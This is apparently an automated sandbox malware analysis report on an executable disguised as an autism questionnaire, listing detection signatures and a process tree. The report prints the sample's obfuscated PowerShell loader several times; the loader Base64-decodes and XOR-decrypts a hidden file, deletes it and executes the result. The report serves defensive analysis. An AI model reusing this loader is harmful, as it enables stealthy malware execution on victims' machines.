Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe

Overview

General Information

Sample Name:Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
Analysis ID:538201
MD5:ae5b37182059c7733466788212370e71
SHA1:e6b0ee285d7042834d23743ad8ca188082ac264f
SHA256:44af59a2d70ba23f2f80d80090d11184ef923a746c0c9ea3c81922bd8d899346
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Powershell dedcode and execute
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Antivirus / Scanner detection for submitted sample
Sigma detected: Encoded FromBase64String
Sigma detected: Powershell Decrypt And Execute Base64 Data
Initial sample is a PE file and has a suspicious name
Sigma detected: FromBase64String Command Line
Suspicious powershell command line found
Sigma detected: Execution Of Other File Type Than .exe
Obfuscated command line found
Writes many files with high entropy
Powershell creates an autostart link
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Found evasive API chain checking for process token information
Contains functionality to launch a program with higher privileges
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" MD5: AE5B37182059C7733466788212370E71)
    • Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp (PID: 2880 cmdline: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" MD5: 8693B9CFB8B4C466AE12CCDC2FEB46CE)
      • AcroRd32.exe (PID: 6300 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
        • AcroRd32.exe (PID: 5356 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
        • RdrCEF.exe (PID: 1304 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
        • RdrCEF.exe (PID: 7608 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7820 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7840 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7884 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7940 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 8024 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • powershell.exe (PID: 5516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5972 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6580 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6612 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6928 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6372 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txtJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
    C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txtJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
      C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txtJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
        C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txtJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
          C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txtJoeSecurity_PowershellDedcodeAndExecuteYara detected Powershell dedcode and executeJoe Security
            Click to see the 1 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Encoded FromBase64StringShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8
            Sigma detected: FromBase64String Command LineShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8
            Sigma detected: Execution Of Other File Type Than .exeShow sources
            Source: Process startedAuthor: Max Altgelt: Data: Command: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentCommandLine: "C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ProcessId: 2880
            Sigma detected: Non Interactive PowerShellShow sources
